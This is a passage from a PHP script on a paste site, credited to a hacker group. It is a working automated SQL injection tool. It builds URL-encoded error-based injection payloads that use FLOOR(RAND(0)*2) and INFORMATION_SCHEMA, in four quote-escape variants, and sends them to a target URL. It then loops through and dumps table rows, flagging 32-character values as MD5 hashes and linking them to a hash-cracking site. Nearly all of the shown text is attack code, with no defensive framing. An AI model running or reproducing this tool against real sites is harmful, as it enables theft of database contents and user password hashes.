  411.  @$datas = "$url+%27%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  412. }elseif($mode_eb==2){
  413.  @$datas = "$url+%27%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  414. }elseif($mode_eb==3){
  415.  @$datas = "$url+%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  416. }elseif($mode_eb==4){
  417. @$datas = "$url+%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  418. }
  419.  
  420.  
  421. @$dato = @file_get_contents("$datas");
  422.  
  423.  
  424.     $i = -1;
  425.    
  426.     echo "<table>";
  427.    
  428.     while ($i <= (GetBetween($dato)-1)):
  429.             if($mode_eb == 1){
  430.     @$_data = "%27%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
  431.     }elseif($mode_eb == 2){
  432.                  
  433.             @$_data = "%27%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
  434.     }elseif($mode_eb == 3){
  435.             @$_data = "%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
  436.     }elseif($mode_eb == 4){
  437.             @$_data = "%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
  438.     }
  439.        
  440.     $datas2 = "$url+$_data";
  441.     $data2 = file_get_contents("$datas2");
  442.     $num4 = GetBetween($data2);
  443.     if(strlen($num4) == 32){
  444.     echo "<tr><td>$num4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$num4')\" style=\"color: blue\">MD5</div></td></tr>";
  445.     }else{
  446.     echo "<tr><td>$num4</td><td>";
  447.     }
  448.     $i++;
  449.     endwhile;
  450.    
  451.  //}
  452.  
  453. echo "</table>";
  454. echo "<table border=0 width=400 align=center><tr><Td><center><p style='font-size: 10pt;'>";
  455. echo "<b>&copy; AZZATSSINS CYBERSERKERS</br></b></td></tr>";
  456. echo "</center>";
  457. }
  458. }
  459.  
  460.  
  461. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!